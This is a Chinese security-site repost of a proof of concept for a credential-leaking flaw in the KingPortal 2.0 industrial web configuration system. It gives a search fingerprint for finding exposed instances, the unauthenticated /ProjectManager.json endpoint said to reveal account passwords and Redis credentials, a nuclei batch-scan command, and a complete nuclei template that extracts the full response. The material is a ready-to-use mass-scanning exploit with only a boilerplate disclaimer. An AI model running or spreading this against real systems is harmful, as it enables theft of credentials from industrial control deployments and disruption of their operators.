KingPortal开发系统 信息泄露(项目工程信息) PoC

admin 2024年10月6日23:15:37评论23 views字数 1069阅读3分33秒阅读模式

一、漏洞简介

北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。 KingPortal开发系统存在敏感信息泄露漏洞,攻击者可以通过漏洞访问接口获取系统账号密码、Redis地址及密码等敏感信息,从而影响系统正常运行。

二、影响版本

KingPortal_2.0

KingPortal开发系统 信息泄露(项目工程信息) PoC

三、资产测绘

body="/public/javascripts/Common/Util/km_util.js"

四、漏洞复现

请求接口获取项目信息

/ProjectManager.json

KingPortal开发系统 信息泄露(项目工程信息) PoC

nuclei批量脚本放在文章最后

nuclei.exe -t "C:UsersAdministratorDesktopKingPortal-leaks-ProjectManager.yaml" -l url.txt

nuclei脚本:

https://github.com/ghosinshell/Nuclei-POC/blob/main/%E5%B7%A5%E6%8E%A7%E6%BC%8F%E6%B4%9E/KingPortal/KingPortal-leaks-ProjectManager.yaml

id: KingPortal-leaks-ProjectManager

info:
  name: KingPortal开发系统-信息泄露
  author: ghosinshell
  severity: critical
  description: KingPortal开发系统-信息泄露(项目信息)
  tags: KingPortal开发系统, KingPortal, 项目信息泄漏
  reference: https://github.com/ghosinshell/Nuclei-POC

requests:
  - method: GET
    path:
      - "{{BaseURL}}/ProjectManager.json"

    matchers:
      - type: word
        words:
          - "projectGroups"
          - "projectMng"
          - "projectArray"

    extractors:
      - type: regex
        part: body
        regex:
          - "(.*)"

原文始发于微信公众号(菜鸟学渗透):KingPortal开发系统 信息泄露(项目工程信息)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月6日23:15:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   KingPortal开发系统 信息泄露(项目工程信息) PoChttps://cn-sec.com/archives/3235173.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息